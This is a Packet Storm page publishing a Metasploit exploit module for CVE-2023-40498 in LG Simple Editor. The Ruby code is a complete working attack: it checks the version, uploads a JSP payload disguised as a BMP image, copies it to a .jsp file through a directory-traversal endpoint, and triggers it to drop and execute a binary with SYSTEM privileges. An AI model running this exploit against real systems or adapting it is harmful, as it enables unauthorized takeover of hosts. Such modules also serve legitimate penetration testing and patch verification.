what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LG Simple Editor Remote Code Execution

LG Simple Editor Remote Code Execution
Posted Sep 8, 2023
Authored by rgod, Ege Balci | Site metasploit.com

This Metasploit module exploits broken access control and directory traversal vulnerabilities in LG Simple Editor software for gaining code execution. The vulnerabilities exist in versions of LG Simple Editor prior to v3.21. By exploiting this flaw, an attacker can upload and execute a malicious JSP payload with the SYSTEM user permissions.

tags | exploit, vulnerability, code execution
advisories | CVE-2023-40498
SHA-256 | 6932d8048db104bdeaa927b23fea68a29152e32fd74b6498bd70fa53bbc37270

LG Simple Editor Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper # includes register_files_for_cleanup
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'LG Simple Editor Remote Code Execution',
'Description' => %q{
This Metasploit module exploits broken access control and directory traversal
vulnerabilities in LG Simple Editor software for gaining code execution.
The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.
By exploiting this flaw, an attacker can upload and execute a malicious JSP
payload with the SYSTEM user permissions.
},
'License' => MSF_LICENSE,
'Author' => [
'rgod', # Vulnerability discovery
'Ege Balcı <egebalci@pm.me>' # msf module
],
'References' => [
['ZDI', '23-1204'],
['CVE', '2023-40498']
],
'DefaultOptions' => {
'WfsDelay' => 5
},
'Platform' => %w[win],
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['LG Simple Editor <= v3.21', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-08-24',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])
]
)
end

def check
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')
}
)

return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))
return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'
return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')

Exploit::CheckCode::Safe
end

def generate_jsp_payload
exe = generate_payload_exe
base64_exe = Rex::Text.encode_base64(exe)
payload_name = rand_text_alpha(rand(3..8))

var_raw = 'a' + rand_text_alpha(rand(3..10))
var_ostream = 'b' + rand_text_alpha(rand(3..10))
var_buf = 'c' + rand_text_alpha(rand(3..10))
var_decoder = 'd' + rand_text_alpha(rand(3..10))
var_tmp = 'e' + rand_text_alpha(rand(3..10))
var_path = 'f' + rand_text_alpha(rand(3..10))
var_proc2 = 'e' + rand_text_alpha(rand(3..10))

jsp = %|
<%@page import="java.io.*" %>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
String #{var_path} = #{var_tmp}.getAbsolutePath();

BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
} catch (Exception e) {
}
%>
|

jsp.gsub!(/[\n\t\r]/, '')

jsp
end

def copy_file(src, dst)
data = {
command: 'cp',
option: '-f',
srcPath: src,
destPath: dst
}
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',
'makeDetailContent.do'),
'headers' => {
'X-Requested-With' => 'XMLHttpRequest',
'Accept' => 'application/json'
},
'ctype' => 'application/json',
'data' => data.to_json
}
)
if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')
print_good "#{src} -> #{dst} copy successfull."
else
fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")
end
end

def exploit
rand_name = Rex::Text.rand_text_alpha(5)
form = Rex::MIME::Message.new
form.add_part(
generate_jsp_payload,
'image/bmp',
'binary',
"form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""
)
form.add_part('/', nil, nil, 'form-data; name="uploadPath"')
form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')
form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')
form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')
form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')

print_status 'Uploading JSP payload...'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
}
)
if res && res.code == 200
print_good 'Payload uploaded successfully'
else
fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")
end

# Now we copy our payload as JSP
copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")
register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")

print_status 'Triggering payload...'
send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")
}
)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close